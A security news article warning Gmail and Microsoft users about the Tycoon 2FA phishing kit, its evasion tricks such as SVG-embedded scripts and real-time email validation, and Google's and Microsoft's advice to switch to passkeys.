New Gmail And Microsoft 2FA Security Warning (2025)

Update, April 15, 2025: This story, originally published April 13, has now been updated with details of how real-time email validation helps attackers, along with further information from Trustwave detailing how attackers obfuscate their 2FA bypass phishing threats.

I’m sorry to have to tell you this, but if you didn’t already realize, you are under attack. No matter the operating system you use, the applications you rely upon or the faith you have in Big Tech to protect you, attackers are coming for your accounts and your data. The higher the profile of those accounts, the more valuable they are and the more hacking scrutiny they are under. Which is why we see security warnings involving such things as Apple ID attacks, X social media data leaks, and both Android and iPhone smartphone FBI defense advice. It is, however, Gmail and Microsoft that are most valued by hackers for the data that a successful account hack can expose. News of the evolution of an already perilous threat that can bypass 2FA protections that both Google and Microsoft have in place is, therefore, naturally of huge concern. Here’s what you need to know and what both tech giants say you must do right now.

ForbesFBI Says Enable 2FA Now As Cyber Attacks SurgeBy Davey Winder

The Evolution Of Tycoon 2FA

Tycoon 2FA is not a new threat, far from it, in fact. As I reported March 26, 2024, the adversary-in-the-middle attack kit first came to the attention of threat intelligence experts in 2023. In March 2024, however, the criminal developers behind it turned the threat dial up a notch or two by releasing an update that specifically targeted Microsoft 365 and Gmail account holders and employed advanced obfuscation and anti-detection capabilities.

Those attackers have, it seems, now turned the dial to 11.

New intelligence from security researchers at Trustwave has revealed even more sophisticated evasion techniques being deployed against Gmail and Microsoft users in the latest 2025 attacks. According to the new report’s authors, Trustwave’s Phil Hay and Rodel Mendrez, these include “using a custom CAPTCHA rendered via HTML5 canvas, invisible Unicode characters in obfuscated JavaScript, and anti-debugging scripts to thwart inspection.”

While conceding that none of these techniques are groundbreaking, individually at least, combining them does pose a new threat that makes detection and response even more difficult. Custom CAPTCHA visuals in HTML5, for example, can add legitimacy to phishing attempts, Unicode and Proxy-based obfuscation can delay detection, and anti-debugging behaviors hide malicious activity from automated tools.

ForbesDOGE Big Balls Ransomware Attack — What You Need To KnowBy Davey Winder

Another Trick Up The 2FA Bypass Phishing Threat Obfuscation Sleeve

Bernard Bautista and Kevin Adriano, also working at Trustwave, have reported how threat actors are using harmless-looking images to hide what are actually dangerous links in a phishing attack. Not just using, but employing them in what the researchers have described as a “major spike” in this type of attack obfuscation.

The attacks are ones that exploit the fact that Scalable Vector Graphics image files are based on the Extensible Markup Language, unlike more typical image formats, and that means they can contain interactive scripts. “SVG-based attacks have sharply pivoted toward phishing campaigns,” the report warned, “with a staggering 1800% increase in early 2025 compared to data collected since April 2024.” Notably, a large surge in such campaigns has been observed during the first quarter of 2025, driven “largely by the emergence of Attack-in-the-Middle, Phishing-as-a-Service, platforms such as Tycoon2FA,” the researchers said.

SVG files are popularly, and perfectly legitimately, used in web design and branding campaigns due to their sharp image output, but the researchers warned that their ability to embed JavaScript introduces serious cybersecurity risks. Attackers use this to inject malicious scripts directly into the image files, which can then “execute automatically upon opening the file, enabling a wide range of cyberattacks, including unauthorized system access, data theft, identity compromise, and leakage of sensitive information.”

The problem is, if it really needed any further explanation, that these malicious scripts can be executed without the need for explicit user interaction, and they are more difficult for security tools to detect and block. Plus, of course, the small matter of people having an elevated yet false sense of security when it comes to images, including SVG files, which are often treated as being of no risk at all.

ForbesWindows Users Given 24-Hour Warning As Attackers StrikeBy Davey Winder

Precision-Validated Credential Theft In 2FA Attacks

Marie Mamaril, part of the Cofense Intelligence Team, has brought attention to another spanner in the protection-bypass works for defenders when it comes to phishing attacks: precision-validated credential theft. This new technique “leverages real-time email validation to ensure only high-value targets receive the phishing attempt,” Mamaril warned, before detailing a number of reasons as to why it is so advantageous from the attacker perspective. These reasons included:

• By implementing real-time email validation, the attack methodology not only increases attack efficiency, Mamaril said, but the fact that it improves the chances of stolen credentials belonging to actively used accounts means that it also improves “the quality of harvested data for resale or further exploitation.”
• The report said the impact on cybersecurity and security operations center teams should not be ignored. Both of these teams are significantly hindered from completing any further analysis or investigation when this precision-validated credential theft technique is deployed.

The key to the success of precision-validated phishing is hinted at in the name. Instead of taking a broad grapeshot approach to the task by distributing attack emails far and wide, precision-validated phishing operates in a highly selective fashion by only actually engaging with those email addresses that have already been “verified as active, legitimate, and often high-value.”

ForbesGoodbye Windows Hello — Microsoft Update Kills Biometric LoginBy Davey Winder

Mamaril explained this by detailing how an attacker will check every email address against a database of pre-collected and verified emails before the target credential phishing login form is displayed to the potential victim. “If the email address entered does not match any from the pre-collected list,” Mamaril said, “the phishing page either returns an error or redirects to a legitimate, benign-looking page, preventing security teams from doing further analysis and investigation.”

Indeed, so effective is the security investigation prevention aspect of this attack technique that automated crawlers, along with sandboxed environments, also have great difficulty in analyzing them as they simply cannot bypass that validation filter. The end result, according to Mamaril, is reduced attacker risk while extending the lifespan of the phishing campaigns concerned. None of which is good news for the end user.

Ultimately, the report concludes that the selective nature of precision-validated phishing attacks means that detection through any kind of shared threat intelligence is harder to accomplish as well. “Since phishing pages do not serve malicious content to everyone,” Mamaril warned, “some traditional URL scanning tools may fail to flag them as threats.” All of which results in traditional blocklisting protections are unlikely to help anyone, and there needs to be a shift towards behavioral analysis and anomaly detection instead, “to identify phishing campaigns before they reach end users.”

ForbesNow Hackers Target USB Flash Drive DataBy Davey Winder

Do This To Protect Against 2FA Bypass Attacks Right Now

Trustwave recommended that security teams should “consider behavior-based monitoring, browser sandboxing, and a deeper inspection of JavaScript patterns” in order to stay one step ahead of the Tycoon 2FA attackers. Google and Microsoft, however, have some more straightforward advice for ordinary users when it comes to protecting themselves and their valuable accounts from the 2FA bypass hackers.

The simple truth is that, from the end user defensive posture perspective, the mitigation advice when it comes to Tycoon 2FA attacks is the same now as it was in 2024, namely, use passkeys.

A Google spokesperson said that “passkeys substantially reduce the impact of phishing and other social engineering attacks. Google research has shown that security keys provide a stronger protection against automated bots, bulk phishing attacks, and targeted attacks than SMS, app-based one-time passwords, and other forms of traditional two-factor authentication.”

Meanwhile, a Microsoft spokesperson said, “As a security best practice, we encourage customers to always practice good computing habits online, including exercising caution when clicking on links to web pages, opening unknown files, or accepting file transfers. In addition, we recommend switching to Passkeys wherever possible and using authentication apps such as Microsoft Authenticator, which warn users about potential phishing attempts.”

So, there you have it: use passkeys to protect your Gmail and Microsoft accounts, not only against this 2FA bypass attack but also against other potential threats. What are you waiting for, do it now.

ForbesMicrosoft’s New Windows Update — 1 Billion Users Warned: Do Not DeleteBy Davey Winder